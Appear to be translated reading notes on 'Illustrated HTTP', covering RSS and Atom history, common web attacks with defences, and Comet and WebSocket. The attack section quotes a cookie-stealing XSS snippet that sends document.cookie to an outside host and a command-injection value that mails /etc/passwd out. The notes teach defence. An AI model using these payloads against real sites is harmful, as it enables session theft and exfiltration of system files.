5. “Illustrated HTTP” – RSS and Network Attacks



This section covers RSS and common network attacks. RSS tends to be greeted with “why hasn’t it disappeared yet?”, but after trying it myself I found it surprisingly useful.

Network attacks sometimes come up as interview questions, so it is worth understanding the basic attack methods and the common ways to prevent them.

Key points

  1. The history of RSS and its meaning and value; personally, I think it suits people who learn independently very well.
  2. An introduction to web attack methods: the basic, common attacks, which are not far removed from our daily life.
  3. Bottlenecks and future development; some of this content is “outdated” because of when the book was written and can be skimmed.

5.1 RSS

5.1.1 RSS History

Most of the following content comes from Wikipedia. Since it is mostly theory, I will not explain too much.

RSS (Really Simple Syndication) and Atom are the general names for the feed formats used to publish news and blog updates.

RSS (full English name: RDF Site Summary or Really Simple Syndication) is translated into Chinese as “simple information aggregation”, also known as aggregated content. It is a format specification for news feeds that aggregates the updates of multiple websites and automatically notifies subscribers.

With RSS, subscribers no longer need to check manually whether a website has new content. RSS can also combine the updates of multiple websites and present them as summaries, which helps subscribers pick out the important items quickly and then choose what to read in detail.
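To make the idea concrete, here is a minimal sketch of what a feed reader does with an RSS 2.0 document: it pulls out each `<item>` and lists its title and link. The feed content, the example.com URLs, and the `textOf` and `parseItems` helpers are all made up for illustration, and the regular-expression parsing is only a shortcut that works on this well-formed sample; a real reader would use a proper XML parser.

```javascript
// A tiny, hypothetical RSS 2.0 feed (all names and URLs are placeholders).
const feedXml = `<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Example Blog</title>
    <link>https://example.com/</link>
    <description>Sample feed for illustration</description>
    <item>
      <title>First post</title>
      <link>https://example.com/posts/1</link>
    </item>
    <item>
      <title>Second post</title>
      <link>https://example.com/posts/2</link>
    </item>
  </channel>
</rss>`;

// Return the text of the first <tag>...</tag> inside a fragment, or null.
function textOf(fragment, tag) {
  const match = fragment.match(new RegExp(`<${tag}>([\\s\\S]*?)</${tag}>`));
  return match ? match[1].trim() : null;
}

// Extract { title, link } for every <item> in the feed.
function parseItems(xml) {
  const items = xml.match(/<item>[\s\S]*?<\/item>/g) || [];
  return items.map((item) => ({
    title: textOf(item, 'title'),
    link: textOf(item, 'link'),
  }));
}

const items = parseItems(feedXml);
for (const { title, link } of items) {
  console.log(`${title} -> ${link}`);
}
```

A reader repeats this for every subscribed feed on a schedule and shows only the items it has not seen before, which is where the "no manual checking" benefit comes from.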

The version history of RSS is as follows:

  • RSS 0.9 (RDF Site Summary): the original RSS version, developed by Netscape Communications Corporation in March 1999 for its portal website. Its basic schema was built on the initial RDF specification.
  • RSS 0.91 (Rich Site Summary): developed in July 1999, adding elements on top of RSS 0.9. It drops RDF and is written in plain XML.
  • RSS 1.0 (RDF Site Summary): released in December 2000 by the RSS-DEV working group at a time when the RSS specifications were in a state of confusion; it returns to the RDF approach used in RSS 0.9.
  • RSS 2.0 (Really Simple Syndication): a separate line of development from RSS 1.0 that stays compatible with RSS 0.91. It was developed by UserLand Software and released in September 2002.

So far RSS exists in several versions, which fall into two main branches (RDF and 2.x).

The RDF (or RSS 1.x) branch includes the following versions:

  • RSS 0.90 is the original Netscape RSS release. This RSS is called _RDF Site Summary_, but is based on an early working draft of the RDF standard and is not compatible with the final RDF proposal.
  • RSS 1.0 is an open format from the RSS-DEV working group, again standing for _RDF Site Summary_. RSS 1.0 is an RDF format like RSS 0.90, but not fully compatible with it, because 1.0 is based on the final RDF 1.0 Recommendation.
  • RSS 1.1 is also an open format, intended to update and replace RSS 1.0. The specification is an independent draft and is not supported or endorsed by the RSS-DEV working group or any other organization.

The RSS 2.X branch (originally UserLand, now Harvard) includes the following versions:

  • RSS 0.91 is the simplified version of RSS released by Netscape, and also the version number of the simplified version originally championed by Dave Winer of UserLand Software. The Netscape version is now called _Rich Site Summary_; it is no longer an RDF format, but it is relatively easy to use.
  • RSS 0.92 through 0.94 are extensions of the RSS 0.91 format and are mostly compatible with each other and with Winer’s version of RSS 0.91, but not with RSS 0.90.
  • RSS 2.0.1 carries the internal version number 2.0. It was declared “frozen”, but was still updated shortly after its release without changing the version number. RSS now stands for _Really Simple Syndication_. The major change in this release is an explicit extension mechanism using XML namespaces.

5.1.2 Atom

I have not worked with Atom much either, so the following is organized from the encyclopedia.

Atom is a pair of related standards. The Atom Syndication Format is an XML-based document format for web feeds, and the Atom Publishing Protocol (AtomPub or APP for short) is an HTTP-based protocol for adding and modifying web resources.

Atom draws on the experience of using the various versions of RSS and is widely supported by aggregation tools, both for publishing and for reading. The Atom feed format was designed as a replacement for RSS, while the Atom Publishing Protocol was meant to replace the various existing publishing methods (such as the Blogger API and the LiveJournal XML-RPC Client/Server Protocol). Several Google services use Atom, and the Google Data API (GData) is also based on it.

Both RSS and Atom are widely supported and compatible with all major consumer feed readers. RSS gained wider adoption thanks to early feed reader support.

Technically, Atom has several advantages: a less restrictive license, an IANA-registered MIME type, an XML namespace, URI support, and RELAX NG support.

Atom consists of the following two standards.

Atom Syndication Format: the web feed format defined for publishing content. When people say just “Atom”, they mean this standard.

Atom Publishing Protocol: a protocol for adding or modifying content on the Web.

For more content, you can refer to these two websites:

The Atom Syndication Format:


Atom Syndication Format(IBM)


5.1.3 Meaning of RSS

In most cases RSS is used to subscribe to blogs and to receive updates from your favorite websites as they are published. Personally, I think of it as a different form of WeChat official account. In recent years, however, WeChat has changed its algorithm: where it used to push every update, it now pushes according to the user’s inferred preferences.

Does RSS still make sense today? Why are people still using it? I think the greatest value of an RSS subscription is that it filters out noise. Reading RSS feeds requires a reader; see the “References” for software of this kind.

RSS has several significant advantages:

  1. It turns passive consumption of information into active acquisition.
  2. It sidesteps the recommendation algorithms of the various Internet companies.
  3. It blocks out the noise of the Internet.
  4. It goes back to basics; not every “step back in time” is wrong.

These points more or less guarantee that many platforms will not like it, because it gets in the way of how they make money.

Of course RSS has its disadvantages. The biggest is that its audience is too small, so it would not be surprising if it disappeared one day. Because there is almost no profit in it, there is little competition; what competition remains is mainly among the few parties that define the standards.

Even so, quite a few people still use RSS.

5.2 WEB attack

To stay simple and efficient, HTTP/1.x remains stateless and has no security mechanisms of its own, so attacks on web applications happen all the time.

Attack methods are mainly divided into active attacks and passive attacks.

A passive attack mainly uses phishing websites or links to lure users into clicking, then runs attack code to obtain personal information from the user’s computer, and so on. An active attack hits the target directly, as a DDoS traffic flood does.

In most cases passive attacks are more common, because they cost the attacker almost no effort. Active attacks are mostly aimed at websites with considerable traffic value, which are attacked this way again and again.

The following is a list of common WEB attack methods based on the contents of the book.

5.2.1 XSS attack

The first is the very common XSS attack (cross-site scripting), which works by injecting illegal HTML tags or JavaScript into a page. With a trap set up on the website in advance, users can be caught when they fill in sensitive personal information.

For example, the book shows a request URL like the following, in which the ID parameter carries a script that rewrites where the login form is submitted (excerpt, truncated in the source):

http://example.jp/login?ID="> <script>var+f=document.getElementById("login"); +f.action="h </script><span+s="

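Besides stealing login information, a script can also grab the contents of the user’s cookie directly, for example with code like the following:

var content = escape(document.cookie); // encode the victim's cookie for use in a URL
document.write("<img src=http://hackr.jp/?"); // start an image tag pointing at the attacker's server
document.write(content); // append the cookie as the query string
document.write(">"); // close the tag so the browser sends the request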
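The usual defense is to escape user-supplied values before writing them into HTML, so that injected markup is displayed as text instead of being executed. A minimal sketch, assuming a hypothetical `escapeHtml` helper (most template engines provide an equivalent) and a made-up attacker value similar to the ID parameter above:

```javascript
// Replace the characters that have special meaning in HTML with entities.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical attacker-controlled value.
const userInput = '"><script>alert(document.cookie)</script>';

// After escaping, the value can no longer close the attribute or open a <script> tag.
const html = `<input type="text" name="ID" value="${escapeHtml(userInput)}">`;
console.log(html);
```

Marking the session cookie as `HttpOnly` is a complementary measure, since such a cookie is not exposed through `document.cookie`.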

5.2.2 SQL Injection

SQL injection mainly occurs when developers are careless about how SQL statements are built and leave loopholes behind.

For example, the book shows that injecting a single quotation mark (followed by a comment marker) into a SQL parameter makes the rest of the statement ineffective, so the attacker can read information that should be inaccessible.

The solution is also relatively simple: use placeholders. Mark each parameter with a special symbol such as “?” and bind the value separately, instead of embedding it directly in the SQL text.

SQL injection works by exploiting the rules of SQL grammar itself through such special characters. In most cases, of course, the root cause is a lack of rigor on the part of the website’s programmers.

If you think this kind of thing rarely happens any more, you are very wrong. A large number of websites in China still fail to prevent even the most basic SQL injection.
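The difference between concatenation and placeholders can be sketched without a database. The table and column names and the `buildUnsafeQuery` and `buildParameterizedQuery` helpers below are hypothetical; the only point is that with a placeholder the input never becomes part of the SQL text.

```javascript
// Unsafe: the input is pasted into the SQL text, so a quote in it changes the statement.
function buildUnsafeQuery(author) {
  return `SELECT * FROM bookTbl WHERE author = '${author}' AND flag = 1`;
}

// Safer: the SQL text is fixed and the value travels separately as a bound parameter.
function buildParameterizedQuery(author) {
  return {
    text: 'SELECT * FROM bookTbl WHERE author = ? AND flag = 1',
    values: [author],
  };
}

// A single quote followed by a comment marker cuts off the rest of the condition.
const malicious = "someone' --";

console.log(buildUnsafeQuery(malicious));
// SELECT * FROM bookTbl WHERE author = 'someone' --' AND flag = 1

const safe = buildParameterizedQuery(malicious);
console.log(safe.text, safe.values);
```

In the unsafe version everything after `--` is treated as a comment, so the `flag = 1` condition silently disappears. Database drivers generally accept a statement and its values in a two-part form like this and perform the binding themselves.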

5.2.3 OS attack

OS command injection attacks are not uncommon. In recent years mining scripts have become a familiar sight on cloud servers, and the malware that arrives through open source components is a constant nuisance.

As a concrete case, the book shows a mail form handler that passes the user-supplied address straight into a shell command. By supplying shell metacharacters such as “;” and the pipe character, the attacker turns the address into extra commands that mail out the contents of /etc/passwd.

my $adr = $q->param('mailaddress');

open(MAIL, "| /usr/sbin/sendmail $adr"); 

print MAIL "From: [email protected]\n";

The attacker specifies the following value as the email address.

; cat /etc/passwd | mail [email protected]

The program receives this value and forms the following command combination.

| /usr/sbin/sendmail ; cat /etc/passwd | mail [email protected]
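A common mitigation is to validate the address strictly and to avoid the shell altogether by passing arguments as an array. The sketch below is written for Node.js, whose `child_process.execFile` runs a program without a shell by default. The `isPlausibleAddress` pattern, the `sendmailArgs` helper, and the sample addresses are assumptions for illustration, and the actual call is left as a comment so nothing is executed.

```javascript
const { execFile } = require('node:child_process');

// Deliberately strict, simplified check: no spaces, no shell metacharacters,
// and no leading "-" that could be mistaken for a command-line option.
function isPlausibleAddress(address) {
  return /^[A-Za-z0-9._%+][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/.test(address);
}

// Build the argument list for the mail command, rejecting suspicious input.
function sendmailArgs(address) {
  if (!isPlausibleAddress(address)) {
    throw new Error('rejected mail address');
  }
  return [address];
}

console.log(sendmailArgs('user@example.com'));

try {
  sendmailArgs('; cat /etc/passwd | mail attacker@example.com');
} catch (err) {
  console.log(err.message);
}

// With execFile the address stays a single argument and is never parsed by a shell:
// execFile('/usr/sbin/sendmail', sendmailArgs(address), callback);
```

The important design choice is that the program and its arguments are kept separate, so characters such as `;` and `|` have no special meaning even if validation misses something.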

5.2.4 DDoS attack

A very direct and brutal attack method: it knocks out the target server with large-scale traffic, leaving it paralyzed and inaccessible. It is therefore also called a denial of service attack or service stop attack.

There are two main types of DDoS attacks:

  • Resource overload: concentrated requests, or meaningless work that is expensive to compute, exhaust the server’s resources.
  • Attacking a system vulnerability so that the service stops. Such vulnerabilities often come from open source code, for example the notorious Fastjson, whose frequent vulnerabilities keep needing patches.

For attackers the cost of a DDoS is very low, because they can buy access to large numbers of compromised machines (“zombie” hosts), often overseas. For an independent website serving online customers there are not many protection options; most of the time the only answer is to “burn money”, because the attack traffic cannot be told apart from legitimate traffic.

5.2.5 Directory Traversal Attack

A directory traversal attack reaches files that were never meant to be exposed by manipulating the path in a request, for example using a script to try to read /etc/passwd and related information in order to obtain user passwords.
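A typical defense is to resolve the requested path and check that the result is still inside the directory the site is allowed to serve. A minimal sketch using Node's `path` module; the `PUBLIC_ROOT` location and the `resolvePublicPath` helper are hypothetical:

```javascript
const path = require('node:path');

// Hypothetical directory that holds the files the site is allowed to serve.
const PUBLIC_ROOT = path.resolve('/var/www/public');

// Resolve a requested path and refuse anything that escapes PUBLIC_ROOT.
function resolvePublicPath(requested) {
  const resolved = path.resolve(PUBLIC_ROOT, requested);
  if (resolved !== PUBLIC_ROOT && !resolved.startsWith(PUBLIC_ROOT + path.sep)) {
    return null; // traversal attempt such as ../../etc/passwd
  }
  return resolved;
}

console.log(resolvePublicPath('img/logo.png'));
console.log(resolvePublicPath('../../etc/passwd')); // null
```

Checking the resolved path rather than searching the input for `..` avoids having to anticipate every encoding of the same trick.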

5.2.6 Cross Site Request Forgery

This is the frequently mentioned CSRF attack. It also uses traps to induce the user to act, and then performs “out-of-bounds” operations under the user’s identity once the user’s authenticated state is available.
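One widely used countermeasure is a per-session anti-CSRF token: the server embeds a random value in its own forms and rejects any state-changing request that does not send it back. A minimal sketch with Node's `crypto` module; the `session` object and both helper names are assumptions for illustration:

```javascript
const crypto = require('node:crypto');

// Create an unpredictable token to store in the session and embed in each form.
function createCsrfToken() {
  return crypto.randomBytes(32).toString('hex');
}

// Compare the submitted token with the session's token in constant time.
function isValidCsrfToken(sessionToken, submittedToken) {
  if (typeof sessionToken !== 'string' || typeof submittedToken !== 'string') {
    return false;
  }
  const expected = Buffer.from(sessionToken);
  const actual = Buffer.from(submittedToken);
  return expected.length === actual.length && crypto.timingSafeEqual(expected, actual);
}

const session = { csrfToken: createCsrfToken() }; // hypothetical session object
console.log(isValidCsrfToken(session.csrfToken, session.csrfToken)); // true
console.log(isValidCsrfToken(session.csrfToken, 'forged-value'));    // false
```

A page on another site can make the browser send the user's cookies, but it cannot read the token, so the forged request fails the check.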

5.2.7 Session Attack

In a session attack, the attacker exploits the fact that many websites keep login-related information in the session: they guess or obtain the user’s session ID by various means and then use it to impersonate the user.

The attack just described is session hijacking, in which the ID is obtained through traps or brute force. The other variant, session fixation, has the attacker get the user to log in with a session ID the attacker already knows, wait for the login to complete, and then access the site with that same ID. Hijacking is like slipping through the door behind someone without being noticed; fixation is like keeping watch and waiting until the owner has left before going in to steal.

A simple protection is to add an IP check during authentication: if the same identity is presented from a different IP address, it can be treated as a possible theft of the session.
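The IP check can be sketched as follows. The in-memory `sessions` map, the helper names, and the sample addresses (taken from the ranges reserved for documentation) are all hypothetical:

```javascript
// Hypothetical in-memory session store: session ID -> { userId, ip }.
const sessions = new Map();

// Remember which IP address the session was created from at login.
function createSession(sessionId, userId, ip) {
  sessions.set(sessionId, { userId, ip });
}

// Accept the session only if it exists and the request comes from the login IP.
function checkSession(sessionId, requestIp) {
  const session = sessions.get(sessionId);
  if (!session) {
    return { ok: false, reason: 'unknown session' };
  }
  if (session.ip !== requestIp) {
    sessions.delete(sessionId); // treat as possible theft and force a new login
    return { ok: false, reason: 'ip mismatch' };
  }
  return { ok: true, userId: session.userId };
}

createSession('abc123', 'alice', '203.0.113.10');
console.log(checkSession('abc123', '203.0.113.10')); // same IP: accepted
console.log(checkSession('abc123', '198.51.100.7')); // different IP: rejected
```

This is only a heuristic, since legitimate users can change IP address (for example on mobile networks). Issuing a fresh session ID at login is the usual complement against the fixation variant.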

5.2.8 Clickjacking

Using iframes and transparent elements, the attacker overlays an invisible page or button on top of the page the user sees. A click meant for the visible page lands on the hidden one, and the user’s credentials for that site are sent along with it.
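The standard countermeasure is for the site to tell browsers not to render its pages inside frames from other origins, using the `X-Frame-Options` header or the `frame-ancestors` directive of `Content-Security-Policy`. A minimal sketch; the `antiFramingHeaders` helper name and the handler in the comment are made up:

```javascript
// Response headers that forbid framing of this page by other origins.
function antiFramingHeaders() {
  return {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': "frame-ancestors 'self'",
  };
}

// Possible use with Node's built-in http server (hypothetical handler):
// res.writeHead(200, { 'Content-Type': 'text/html', ...antiFramingHeaders() });
console.log(antiFramingHeaders());
```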

5.2.9 Password cracking

The usual means of password cracking are the exhaustive (brute force) method and the dictionary attack. A dictionary attack takes advantage of users’ habit of choosing passwords based on birthdays or names and tries candidates from a prepared list, while the exhaustive method generates every candidate according to a rule and tries them one by one. Exhaustive cracking is only practical when the key space is small enough. Encrypted password data can be attacked as well, again by trial and error against a dictionary.

Common ways of cracking encrypted passwords are as follows:

  • Inference by brute force or dictionary attack: hash each candidate password with the same hash function and compare the result with the target value. This works against systems that protect passwords with a common, known hash function.
  • Rainbow table: a database table made up of plaintext passwords and their corresponding hash values, prepared in advance to cut the time that exhaustive and dictionary methods would otherwise take. As I understand it, the name comes from the table covering ciphertext produced by many different functions, like the colors of a rainbow. The rainbow table is one of the more effective means of cracking. For example, https://freerainbowtables.com/ publishes a rainbow table of MD5 hash values for every string of 1 to 8 uppercase letters, lowercase letters, and digits.
  • Obtaining the key: the attacker gets hold of the key through network hijacking or other means and forges requests to the target server with it, deceiving the server into giving up the protected data.
  • Vulnerabilities in the encryption algorithm: it is very hard to find flaws in today’s mainstream encryption algorithms, so this method has a very low success rate.

To prevent password cracking, count failed password attempts and limit frequent requests within a short period. For stored passwords, a random value called a “salt” is combined with the original password before it is hashed, so identical passwords no longer produce identical ciphertext.
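Both defenses can be sketched with Node's built-in `crypto` module. The choice of scrypt, the limit of five attempts, the in-memory `failures` map, and the helper names are assumptions for illustration, not something the book prescribes.

```javascript
const crypto = require('node:crypto');

// Hash a password with a fresh random salt using scrypt.
function hashPassword(password) {
  const salt = crypto.randomBytes(16);
  const hash = crypto.scryptSync(password, salt, 32);
  return { salt: salt.toString('hex'), hash: hash.toString('hex') };
}

// Recompute the hash with the stored salt and compare in constant time.
function verifyPassword(password, stored) {
  const hash = crypto.scryptSync(password, Buffer.from(stored.salt, 'hex'), 32);
  return crypto.timingSafeEqual(hash, Buffer.from(stored.hash, 'hex'));
}

// Lock an account after too many consecutive failures (the limit is arbitrary).
const MAX_FAILURES = 5;
const failures = new Map();

function login(user, password, stored) {
  if ((failures.get(user) || 0) >= MAX_FAILURES) return 'locked';
  if (verifyPassword(password, stored)) {
    failures.delete(user);
    return 'ok';
  }
  failures.set(user, (failures.get(user) || 0) + 1);
  return 'wrong password';
}

const stored = hashPassword('correct horse');
console.log(login('alice', 'guess', stored));         // wrong password
console.log(login('alice', 'correct horse', stored)); // ok
```

Because every record gets its own salt, a precomputed rainbow table no longer matches the stored values, and the attempt limit slows down online guessing.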

5.2.10 Backdoor

A backdoor is an entry point planted once a loophole is available, rather than a direct attack. By quietly exploiting the loophole through the backdoor, an attacker can steal information without any visible problem in day-to-day use. Because it is so hard to detect, a backdoor is a highly dangerous form of web attack. Backdoors usually fall into three types:

  • A backdoor built in during development for debugging.
  • A backdoor inserted by developers for their own benefit.
  • A backdoor planted by an attacker by some means.

A brief word on the second type, for which there are many real cases, such as the crude one in which a payment website’s payment code was randomly swapped out through a backdoor.

There are also backdoors of the “fleecing” kind, which skim a “handling fee” of “0.00*N1” from each order. Unless you have very sharp eyes, such a program is hard to spot. Each amount is tiny, but with a very large number of users the income adds up to a huge sum.

These are red lines. Don’t try it!

5.3 Bottlenecks and “future” developments

Reading the book today, the “future” it describes has already arrived, so this content can be read quickly.

  • SPDY (HTTP2.0)
  • Ajax
  • WebSocket
  • Comet
  • HTTP long connection

5.3.1 SPDY – The Chromium Projects

This part of the content is explained in detail in the history of HTTP2.0 in [[“Illustrated HTTP” – HTTP Protocol Historical Development (Key Points)]], and will not be repeated here.

5.3.2 Ajax

The core technology of Ajax is an API called XMLHttpRequest. JavaScript calls it to communicate with the server over HTTP, which lets Ajax update part of a web page without reloading the whole page.

5.3.3 Comet

The word originally means “comet”. Before WebSocket had fully solved its browser compatibility problems, there was widespread demand for “server push”, and that demand drove the development of Comet. Comet was almost indispensable in web-based instant messaging solutions.

Before Comet:

Before Comet, server push was implemented with Flash, which has since been abandoned. Using Flash required the user to install it voluntarily. Flash could easily be called from JavaScript and provided the XMLSocket class for reverse push, so for a long time it was the only way to push from the server side.

Another technology is the long-dead Java Applet, which opened a socket connection for server push through java.net.Socket, java.net.DatagramSocket, or java.net.MulticastSocket. Its fatal flaw was that an Applet could not work together with JavaScript to refresh the page dynamically in real time.

How did Comet develop?

Real-time Comet also depended on the spread of Ajax. Comet is therefore defined as a “server push” technology based on HTTP long connections that needs no plug-in installed in the browser.

How is Comet implemented?

There are two ways to implement Comet: the first is Ajax-based long polling, and the second is streaming based on an iframe and htmlfile.

First, the long polling method. It has to keep re-establishing HTTP connections with the server, and every new connection adds network overhead that would otherwise be unnecessary.

The second is streaming with a nested iframe and htmlfile. Although this use of iframes has long been discouraged, it was once one of the few options for implementing long connections and played an important role.

The principle is simple: the URL that delivers the data is placed in the src attribute of the iframe. Instead of returning a page for the iframe, the server returns calls to JavaScript functions on the client, and the client executes each piece of script as it arrives.

Many browsers do not cope well with this kind of nested JavaScript call inside an iframe, however, so Google later proposed using the htmlfile ActiveX object; in practice this means wrapping iframe and htmlfile in a JavaScript Comet object.

Because old versions of IE behaved differently from Chrome and Firefox, this used to be extremely painful in terms of IE compatibility, and it required extra boilerplate code on the front end.

With Comet, the server returns a response as soon as it has an update. It simulates push with a delayed response: when a request arrives, Comet leaves the response pending, and returns it only when content is updated on the server side.
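The pending-response idea can be modeled in a few lines without any network code. In this sketch the `LongPollChannel` class and the `clientLoop` function are hypothetical stand-ins for the server's request handler and the browser's Ajax loop, and timeouts are left out for brevity.

```javascript
// A minimal in-process model of long polling: requests wait until data is published.
class LongPollChannel {
  constructor() {
    this.pending = []; // callbacks of requests that are being held open
  }

  // A client request arrives: hold it instead of answering immediately.
  poll(respond) {
    this.pending.push(respond);
  }

  // The server has new data: answer every held request at once.
  publish(message) {
    const waiting = this.pending;
    this.pending = [];
    for (const respond of waiting) respond(message);
  }
}

const channel = new LongPollChannel();
const received = [];

// The client re-issues the request as soon as a response arrives.
function clientLoop() {
  channel.poll((message) => {
    received.push(message);
    clientLoop();
  });
}

clientLoop();
channel.publish('update 1');
channel.publish('update 2');
console.log(received); // [ 'update 1', 'update 2' ]
```

Every delivery still costs one full request and response, which is the overhead that long polling cannot avoid.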

Related open source components

  • Pushlet: Open source Comet framework, using the observer model
  • IComet: a comet/push server developed in C++ language that supports millions of concurrent connections

Comet is a transitional stopgap for the old problem of server push. It solved the problem to a degree, but only in a roundabout way: fundamentally, requests are still initiated by the client.

So there is no need to spend much effort on Comet; more details can be found in the “References” section.

5.3.4 HTTP persistent connection features

Besides Comet’s own limitations, HTTP long connections have some noteworthy characteristics.

  1. Connection limits. HTTP/1.1 says that a client should not keep more than two connections open to the same server, and in IE a download of more than two files is blocked.
  2. Server-side performance and scalability. Ajax sends frequent requests and Comet holds a connection for a long time. The java.nio package introduced in Java 1.4 can return a connection’s thread to the thread pool while the connection is idle, but frequent Ajax requests leave few connections idle, which still hurts performance. Jetty therefore has some optimizations for Comet, described in detail in the article “AJAX, Comet and Jetty” (which unfortunately can no longer be found).
  3. Separation of control information and display data. Closing a long connection normally relies on the client sending a close request, but clients often just close the page, and the server is left blocked waiting. To handle this, the Ajax implementation sends the close request asynchronously. The iframe-based approach needs two iframes, one for display and one for exchanging control information, so that control requests get a quick response without being blocked behind display data.
  4. Maintaining a heartbeat. The server needs a mechanism to check whether the client is still active. It periodically checks whether the client has closed the connection: if the connection is still open it goes back to its blocking read, and if the client is gone an exception is raised and the server closes the connection to release resources.

    Note that the Ajax-based long polling method needs a timer on the server: if the client sends no request for longer than the timer allows, the server assumes the client has closed and releases its resources, so that server resources are used effectively.

    Finally, if the server itself runs into a problem, it should also notify the client and release resources, so that resources do not leak.
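The timer-based check for long polling can be sketched as a small bookkeeping class. The `HeartbeatMonitor` name, the 30-second timeout, and the injected clock are assumptions for illustration; a real server would call `reap()` periodically, for example from `setInterval`.

```javascript
// Track when each client was last heard from and drop the ones that went silent.
class HeartbeatMonitor {
  constructor(timeoutMs, now = Date.now) {
    this.timeoutMs = timeoutMs;
    this.now = now;            // injectable clock, which keeps the logic easy to test
    this.lastSeen = new Map(); // clientId -> time of the last request or heartbeat
  }

  // Record activity from a client (a poll request or a heartbeat reply).
  touch(clientId) {
    this.lastSeen.set(clientId, this.now());
  }

  // Remove clients silent for longer than timeoutMs and return their IDs,
  // so the caller can close their connections and release resources.
  reap() {
    const expired = [];
    for (const [clientId, seenAt] of this.lastSeen) {
      if (this.now() - seenAt > this.timeoutMs) {
        this.lastSeen.delete(clientId);
        expired.push(clientId);
      }
    }
    return expired;
  }
}

let fakeTime = 0;
const monitor = new HeartbeatMonitor(30000, () => fakeTime);
monitor.touch('client-a');
fakeTime = 20000;
monitor.touch('client-b');
fakeTime = 40000;
const expiredClients = monitor.reap();
console.log(expiredClients); // [ 'client-a' ]
```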

5.3.5 WebSocket

WebSocket was originally part of the HTML5 standard, but it gradually separated from HTML5 and became an independent protocol. Modern mainstream browsers basically all support WebSocket (old versions of IE are the exception).

On December 11, 2011, the WebSocket protocol was standardized as RFC 6455 - The WebSocket Protocol.

WebSocket addresses the pain points of Comet and Ajax. Once a WebSocket connection is established between the web server and the client, all subsequent communication uses this dedicated protocol, which is why the connection is said to be “upgraded”. The client no longer has to fetch data actively: once the connection exists, the server can push data to the client directly.

Design purpose: WebSocket was originally meant to fix the shortcomings of Ajax and Comet, both of which rely on XMLHttpRequest. Their fundamental flaw is that a request can only be initiated by the client.

That does not mean real-time updates are impossible with client requests alone. One way is polling, but polling means connecting to the server over and over; Comet served as a compatible stopgap in the meantime.

WebSocket has the following characteristics:

(1) Based on the TCP protocol, it is compatible up and down.

(2) It is highly compatible with HTTP. The default ports are also 80 and 443, and the handshake uses HTTP, so the handshake is not easily blocked and can pass through HTTP proxy servers.

(3) The data format is lightweight, so communication is efficient.

(4) Text or binary data can be sent.

(5) There is no same-origin restriction, and the client can communicate with any server.

(6) The protocol identifier is ws (or wss if encrypted), and the server address is a URL.

(7) Reduce communication traffic, because once a connection is established, it will remain connected, so the overhead of the HTTP header will also be reduced.


// Create WebSocket connection.
const socket = new WebSocket('ws://localhost:8080');

// Connection opened: send a first message to the server.
socket.addEventListener('open', function (event) {
    socket.send('Hello Server!');
});

// Listen for messages pushed by the server.
socket.addEventListener('message', function (event) {
    console.log('Message from server ', event.data);
});

The basic steps are as follows:

  1. Handshake request. After the HTTP connection is established, the client uses the HTTP Upgrade header field to tell the server that the communication protocol is changing. In other words, once the HTTP connection is in place, the client sends a further “upgrade protocol” request:
GET /chat HTTP/1.1
Host: server.example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Origin: http://example.com
Sec-WebSocket-Protocol: chat, superchat
Sec-WebSocket-Version: 13

Remarks: the Sec-WebSocket-Key field carries the key value that is essential to the handshake. The Sec-WebSocket-Protocol field lists the sub-protocols to be used.

  2. Handshake response. Because data may already have been exchanged over the initial HTTP connection, the server answers the previous request with the status code 101 Switching Protocols.

If you don’t know what 101 is, it doesn’t matter. Take a look at the [[“Illustrated HTTP”-Status Code]] chapter and you will find that it is simply an informational status code.
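As a sketch of what the server does with Sec-WebSocket-Key before answering with 101: RFC 6455 has it append a fixed GUID to the key, take the SHA-1 hash, and return the result base64-encoded in Sec-WebSocket-Accept. The helper names below are made up, and the response is built for the sample request shown earlier with the "chat" sub-protocol assumed to be the one the server picks.

```javascript
const crypto = require('node:crypto');

// Fixed GUID defined by RFC 6455 for the opening handshake.
const WEBSOCKET_GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11';

// Derive Sec-WebSocket-Accept: base64(SHA-1(key + GUID)).
function computeAccept(secWebSocketKey) {
  return crypto
    .createHash('sha1')
    .update(secWebSocketKey + WEBSOCKET_GUID)
    .digest('base64');
}

// Build the server's handshake response as raw HTTP text.
function handshakeResponse(secWebSocketKey, protocol) {
  return [
    'HTTP/1.1 101 Switching Protocols',
    'Upgrade: websocket',
    'Connection: Upgrade',
    `Sec-WebSocket-Accept: ${computeAccept(secWebSocketKey)}`,
    `Sec-WebSocket-Protocol: ${protocol}`,
    '',
    '',
  ].join('\r\n');
}

console.log(handshakeResponse('dGhlIHNhbXBsZSBub25jZQ==', 'chat'));
```

For the sample key the computed value is `s3pPLMBiTxaQ9kYGzzhZRbK+xOo=`, the same value RFC 6455 gives in its own example. The client checks it to confirm that the server really understood the WebSocket handshake.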


The WebSocket diagrams in the book are good; they give an intuitive feel for how WebSocket, as a separate protocol, cooperates with HTTP.


There are many details of WebSocket that could be expanded on. Since the book is aimed at beginners, these reading notes will not go further. I also found some material online as further reading; for details, see the “References” section.

Web history

The history of the Web covers HTML, CSS, JavaScript, and the DOM, and also introduces the Servlet, which is supposedly no longer used. Servlet deserves a mention here: this technology, which seems to have nothing to do with today’s Web, is actually still active in another form, wrapped up and hidden inside Spring. So if you want to learn the Web well, mastering Servlet thoroughly is essential.